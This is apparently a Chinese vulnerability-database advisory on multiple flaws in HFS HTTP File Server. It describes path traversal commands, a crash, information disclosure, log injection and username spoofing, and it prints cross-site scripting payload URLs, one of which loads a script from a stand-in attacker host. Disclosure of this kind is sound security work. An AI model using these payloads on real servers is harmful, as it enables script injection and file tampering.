HFS HTTP File Server存在多个漏洞

基本字段

漏洞编号：: SSV-2855

披露/发现时间：: 未知

提交时间：: 2008-01-25

漏洞等级：

漏洞类别：: 其他类型

影响组件：: (2.3,2.3,2.2,2.2,2.2,1.5)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.2KB

HFS HTTP File Server是一款HTTP文件服务程序。 HFS HTTP File Server存在多个安全问题，远程攻击者可以利用漏洞进行跨站脚本，信息泄漏，拒绝服务，任意文件建立和用户名伪造等攻击。 1）使用"mkd"和"manipf"命令可导致任意文件和目录建立或操作： mkd ..\Syhunt manipf inject.html ..\Syhunt\index.html 2）发送特殊构建的请求，可导致服务程序崩溃。 3）不正确过滤用户的URI输入，可导致跨站脚本攻击： http://<script>var%20sChar=String%2efromCharCode(58)%3bdocument %2ewrite('<script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom %2fxss%2ejs><%5c%2fscript>')%3b<%2fscript>a:x@[host]/ http://<script>alert('Syhunt%20XSS')<%2fscript>a:x@[host]/ 4）"ver"会显示版本信息，"symbols"命令会显示大量服务器信息。 5）使用maniplog [localfilename]命令可导致注入任意内容到HFS日志文件中。 6）存在用户名伪造问题，如以[user_x]登录，并请求http://[user_y]:[anywrongpwd]@[host]/ HTTP File Server HTTP File Server 2.3(Beta Build #174) HTTP File Server HTTP File Server 2.3 beta HTTP File Server HTTP File Server 2.2b HTTP File Server HTTP File Server 2.2a HTTP File Server HTTP File Server 2.2 HTTP File Server HTTP File Server 1.5g 升级程序： HTTP File Server HTTP File Server 2.2b * HTTP File Server hfs2.2c.zip <a href=http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi target=_blank>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi</a> g_mirror=0 HTTP File Server HTTP File Server 2.3 beta * HTTP File Server hfs2.2c.zip <a href=http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi target=_blank>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi</a> g_mirror=0 HTTP File Server HTTP File Server 2.3(Beta Build #174) * HTTP File Server hfs2.2c.zip <a href=http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi target=_blank>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi</a> g_mirror=0 HTTP File Server HTTP File Server 2.2a * HTTP File Server hfs2.2c.zip <a href=http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi target=_blank>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi</a> g_mirror=0 HTTP File Server HTTP File Server 1.5g * HTTP File Server hfs2.2c.zip <a href=http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi target=_blank>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi</a> g_mirror=0 HTTP File Server HTTP File Server 2.2 * HTTP File Server hfs2.2c.zip <a href=http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi target=_blank>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&bi</a> g_mirror=0